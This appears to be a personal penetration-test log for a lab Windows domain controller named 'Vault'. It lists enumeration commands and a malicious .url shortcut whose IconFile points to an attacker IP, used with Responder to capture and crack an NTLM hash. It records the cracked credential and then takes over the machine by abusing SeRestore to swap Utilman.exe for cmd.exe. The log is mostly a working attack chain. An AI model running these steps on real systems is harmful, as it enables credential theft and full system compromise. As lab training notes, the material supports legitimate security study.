Vault
๐งช Pentest Log: {{date:2025-08-04}}
๐ Target Information
- Machine Name: Vault
- IP Address: 192.168.123.172
- Operating System: Windows
ip=192.168.123.172
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 53
dig any vault.offsec @$ip
dig AXFR @$ip
Port 135, 593
rpcclient -U '' -N $ip
Port 139, 445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 389, 636, 3268, 3269
ldapsearch -H ldap://$ip -x -s base namingcontexts
ldapsearch -H ldap://$ip -x -b"DC=hutch,DC=offsec" > ldap_dump.txt
Port 3389
Port 5985
๐ฃ Exploitation / Foothold
Tool / Script Used:
put evil.url
[InternetShortcut]
URL=Random_nonsense
WorkingDirectory=Flibertygibbit
IconFile=\\192.168.45.163\%USERNAME%.icon
IconIndex=1
sudo responder -I tun0 -wv
recieved anirudh's hash, crack it with john
anirudh:SecureHM
๐งฌ Privilege Escalation
๐ค Current Access
- User: anirudh
- Groups: N/A
- Shell Type: evil winrm
๐ Enumeration
Access Tokens
whoami /priv
found current user has SeRestore privilege on
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Abusing Tokens
- Target Binary/Service: SeRestore
- Reference / Source: https://hacktricks.boitatech.com.br/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
๐ง Exploit Steps
- Smash to Administrator
.\EnableSeRestorePrivilege.ps1
mv C:\\Windows\\System32\\Utilman.exe C:\\Windows\\System32\\Utilman.old
mv cmd.exe Utilman.exe
rdesktop -0 192.168.123.165
press win+U